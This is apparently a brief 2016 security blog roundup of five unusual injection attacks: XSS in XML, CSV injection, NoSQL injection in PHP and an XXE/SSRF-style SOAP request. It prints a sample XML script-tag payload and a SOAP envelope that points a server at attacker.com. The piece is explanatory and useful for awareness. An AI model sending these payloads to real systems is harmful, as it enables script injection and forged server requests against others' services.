Five Interesting Injection Attacks
Everyone is familiar with SQLi and XSS. To make things more interesting, here are five more unusual injection attacks that have appeared recently.
In no particular order:
XSS in your XML
This “XSS in XML” exploit appears to work in Chrome but not Safari (and didn’t test in Firefox).
XSS in XML - exploitation demo to run an external JS in full DOM: https://t.co/42gqNp51zb— Soroush Dalili (@irsdl) July 15, 2016
Another XSS in your XML
<x:script xmlns:x="http://www.w3.org/1999/xhtml" src="data:,alert(1)" />
Yes, “Comma Separated Value” injection. Really??? https://blog.zsec.uk/csv-dangers-mitigations/ The advice is the usual
It should also be considered that all user input be not trusted and as a result any output should be encoded.
CSV Injection Revisited - Making Things More Dangerious (and fun) : https://t.co/7uSqcGNiou— Binni Shah (@binitamshah) July 23, 2016
This should really be NoSQL injection using PHP, as the techniques appear to specific to PHP’s drivers.
This may or may not be a re-hash of Analysis and Mitigation of NoSQL Injections which came out a few months earlier.
NoSQL data storage systems have become very popular due to their scalability and ease of use. Unfortunately, they lack the security measures and awareness that are required for data protection. Although the new data models and query formats of NoSQL data stores make old attacks such as SQL injections irrelevant, they give attackers new opportunities for injecting their malicious code into the statements passed to the database. Analysis of the techniques for injecting malicious code into NoSQL data stores provides examples of new NoSQL injections as well as Cross-Site Request Forgery attacks, allowing attackers to bypass perimeter defenses such as firewalls. Analysis of the source of these vulnerabilities and present methodologies can mitigate such attacks. Because code analysis alone is insufficient to prevent attacks in today’s typical large-scale deployment, certain mitigations should be done throughout the entire software life cycle.
XXE Injection is always a bit of a weirdo.
By uploading a XML file with an external XML entity, you can make the server send or retrieve arbitrary files or URLs. The example here is:
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <SOAP-ENV:Body> <m:XXX xmlns:m="http://sap.com/monitoring/ws/sn/"> <url>attacker.com</url> </m:XXX> </SOAP-ENV:Body> </SOAP-ENV:Envelope>